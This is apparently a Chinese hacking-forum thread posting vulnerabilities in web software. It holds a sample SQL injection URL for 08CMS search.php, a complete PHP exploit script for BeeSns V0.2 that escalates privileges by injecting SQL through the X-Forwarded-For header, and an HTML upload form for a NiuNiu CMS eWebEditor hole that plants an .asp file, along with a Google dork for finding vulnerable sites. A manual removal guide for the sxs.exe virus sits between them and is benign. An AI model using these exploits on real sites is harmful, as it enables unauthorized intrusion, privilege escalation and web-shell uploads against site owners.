最近看过此主题的会员

返回列表 发帖

我的第一次

弄个潜水MJJ奖章

 

您可能还想看的主题:

潜水MJJ勋章

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:忧郁小男生发表,本帖发表者忧郁小男生符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者忧郁小男生和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

08CMS小说搜索search.php注入漏洞
//搜索词预处理
$searchword = empty($searchword) ? ” : cutstr(trim($searchword),50,”);
$_da['searchword'] = $searchword;
if($searchword){ www.2cto.com
$filterstr .= ($filterstr ? ‘&’ : ”).’searchword=’.rawurlencode(stripslashes($searchword));
}
//预处理搜索模式:标题subject、关键词keywords、内容fulltxt、会员mname
$searchmode = empty($searchmode) ? ‘subject’ : trim($searchmode);
if(!in_array($searchmode,array(‘subject’,’keywords’,’fulltxt’,’mname’))) $searchmode = ‘subject’;
if(!$chid){
$nochids = empty($nochids) ? ” : trim($nochids);
if($nochids){//排除的模型
$_da['nochids'] = $nochids;
$filterstr .= ($filterstr ? ‘&’ : ”).”nochids=”.$nochids;
$nochids = explode(‘,’,$nochids);
if($nochids) $wherestr .= ” AND a.chid “.multi_str($nochids,1);
}
出现搜索型注入。
http://www.sitedirsec.com/search.php?searchmode=subject&searchword=[%]&caid=0&chid=0&ccid4=0&indays=0&orderby=createdate&searchsubmit=1


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

BeeSns微博V0.2 0day
发布作者:子仪
影响版本:BeeSns V0.2
官方地址: http://www.beesns.com/
漏洞类型:权限提升
漏洞分析:IP过滤不严,导致用户可以提交恶意参数提升自身权限。这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧
// 获取客户端IP     function getip() {      if (isset($_SERVER)) {       if (isset($_SERVER[HTTP_X_FORWARDED_FOR])) {        $realip = $_SERVER[HTTP_X_FORWARDED_FOR];       } elseif (isset($_SERVER[HTTP_CLIENT_IP])) {       $realip = $_SERVER[HTTP_CLIENT_IP];       } else {        $realip = $_SERVER[REMOTE_ADDR];       }      } else {       if (getenv("HTTP_X_FORWARDED_FOR")) {       $realip = getenv( "HTTP_X_FORWARDED_FOR");       } elseif (getenv("HTTP_CLIENT_IP")) {        $realip = getenv("HTTP_CLIENT_IP");       } else {        $realip = getenv("REMOTE_ADDR");       }      }     $iphide=explode(".",$realip);            $realip="$iphide[0].$iphide[1].$iphide[2].$iphide[3]";//!我不明白作者写的神马东西,IP没过滤,漏洞产生      return $realip;   
EXP:

[quote]
<?php     print_r('     +---------------------------------------------------------------------------+<br>     BeeSns v0.2 Getip() Remote SQL Injection Exploit<br>     site:www.beesns.com  <br>     by 子仪<br>     Blog: http://www.sitedirsec.com  <br>                      +---------------------------------------------------------------------------+<br>');           if (empty($_POST[submit])) {     }else{      error_reporting(7);      ini_set('max_execution_time', 0);     $host = $_POST[host];      $path = $_POST[path];      $username =  $_POST[username];      $password =  $_POST[password];      send();     }      <!--more-->           function send()     {         global $host, $path,$username,$password;                $cmd = "uId=".$username."&amp;uPw=".$password;         $getinj="1.1.1.1',permissions=5 where uid='$username'#";         $data = "POST ".$path."post.php?act=userLogin HTTP/1.1
";         $data .= "Accept: */*
";         $data .= "Accept-Language: zh-cn
";         $data .= "Content-Type: application/x-www-form-urlencoded
";         $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
";         $data .= "Host: $host
";         $data .= "Content-Length: ".strlen($cmd)."
";         $data .= "Connection: Close
";         $data .= "X-Forwarded-For: $getinj

";         $data .= $cmd;              $fp = fsockopen($host, 80);         fputs($fp, $data);               $resp = '';                while ($fp &amp;&amp; !feof($fp))             $resp .= fread($fp, 1024);            if(preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis',$resp)){       echo "<br><font color='green'>提升权限成功!</font>";      }else{       echo "<font color='red'>Failed!</font>";      }            }     ?>     <form action='' method='POST'>     目标地址:<input type='input' name='host' value='www.sitedirsec.com'>*请勿加<a href="http://


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

sxs.exe病毒专杀工具
前些天电脑中了“sxs.exe病毒”,后来整理了一篇“sxs.exe病毒手动删除方法”,没想到短短几天时间,通过搜索找过来的朋友就突破8000大关,此病毒发作之广可想而知。 杀毒软件方日前终于推出了针对此病毒的专杀工具,再遇到这个问题的朋友就无须自己动手了。 说明: 引用 8月初出现了大量针对主流杀毒软件编写的恶性病毒。它们除了具有常见危害外,还会造成主流杀毒软件和个人防火墙无法打开,甚至导致杀毒时系统出现“蓝屏”、自动重启、死机等状况。 瑞星“橙色八月专用提取清除工具”专门针对此类病毒编写,可清除“QQ通行证(Trojan.PSW.QQPass)”、“传奇终结者(Trojan.PSW.Lmir)”、“密西木马(Trojan.psw.misc)”等病毒及其变种。没有安装瑞星杀毒软件的用户可免费下载使用。 注:建议您重新启动计算机,按住F8键,选择“安全模式”,进入后使用此工具杀毒。 附:病毒列表上的病毒主要针对以下安全软件 卡巴斯基 Symantec AntiVirus 瑞星 江民杀毒软件 天网防火墙个人版 噬菌体 木马克星 金山毒霸 橙色八月专用提取清除工具下载地址: http://it.rising.com.cn/Channels/Service/2006-08/1154786729d36873.shtml   *************************************** sxs.exe病毒手动删除方法  有史以来第一次遭遇如此顽固的病毒,网上找了找,没有统一的名字,瑞星称为 Trojan.PSW.QQPass.pqb 病毒,我就叫它 sxs.exe病毒吧 重装系统后,双击分区盘又中了,郁闷,瑞星自动关闭无法打开,决定手动将其删除 现象:系统文件隐藏无法显示,双击盘符无反映,任务管理器发现 sxs.exe 或者 svohost.exe (与系统进程 svchost.exe 一字之差),杀毒软件实时监控自动关闭并无法打开 找了网上许多方法,无法有效删除,并且没有专杀工具 手动删除“sxs.exe病毒”方法: 在以下整个过程中不得双击分区盘,需要打开时用鼠标右键——打开 一、关闭病毒进程 Ctrl + Alt + Del 任务管理器,在进程中查找 sxs 或 SVOHOST(不是SVCHOST,相差一个字母),有的话就将它结束掉 二、显示出被隐藏的系统文件 运行——regedit HKEY_LOCAL_MACHINE"Software"Microsoft"windows"CurrentVersion" explorer"Advanced"Folder"Hidden"SHOWALL, 将CheckedValue键值修改为1 这里要注意,病毒会把本来有效的DWORD值CheckedValue删除掉,新建了一个无效的字符串值CheckedValue,并且把键值改为 0!我们将这个改为1是毫无作用的。(有部分病毒变种会直接把这个CheckedValue给删掉,只需和下面一样,自己再重新建一个就可以了) 方法:删除此CheckedValue键值,单击右键 新建——Dword值——命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”。 在文件夹——工具——文件夹选项中将系统文件和隐藏文件设置为显示 三、删除病毒 在分区盘上单击鼠标右键——打开,看到每个盘跟目录下有 autorun.inf 和 sxs.exe 两个文件,将其删除。 四、删除病毒的自动运行项 打开注册表 运行——regedit HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run 下找到 SoundMam 键值,可能有两个,删除其中的键值为 C:WINDOWSsystem32SVOHOST.exe 的 最后到 C:WINDOWSsystem32" 目录下删除 SVOHOST.exe 或 sxs.exe 重启电脑后,发现杀毒软件可以打开,分区盘双击可以打开了。 五、后续 杀毒软件实时监控可以打开,但开机无法自动运行 最简单的办法,执行杀毒软件的添加删除组件——修复,即可。 最近发现中毒的人比较多相关软件下载http://upload.programfan.com/upfile/200611280727787.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

牛牛CMS企业网站管理系统ewebeditor漏洞
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统,公司业务范围涵盖互联网软件系统和互联网安全保障系统开发、企业网站策划、网页设计、虚拟主机、网站维护、域名注册等。其主营产品“牛牛企业网站管理系统”是目前国内中小企业应用最广泛的CMS程序。通过多年的不断创新与完善,使系统集安全、实用、稳定、灵活于一身。牛牛CMS管理系统采用ASP+ACCESS平台开发作为目前最方便快捷使用最多的平台之一低成本预算成为中小企业建站首选.公司拥有一支一流的程序开发团队有着多年中小企业网站建设成功经验官网:http://web.shangpuba.com/后台:admin/login.asp其默认使用网站富媒体编辑器存在上传漏洞



exp:
<form action=http://www.sitedirsec.com/Admin/WebEditor168/asp/upload.asp?action=save&amp;type=image&amp;style=popup&amp;cusdir=Mr.DzY.asp method=post name=myform enctype=multipart/form-data>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>复制代码谷歌关键字:inurl:member/Register.asp 您好,欢迎来到立即注册立即登录


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

注:偶是女滴,千真万确,毋庸置疑!


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表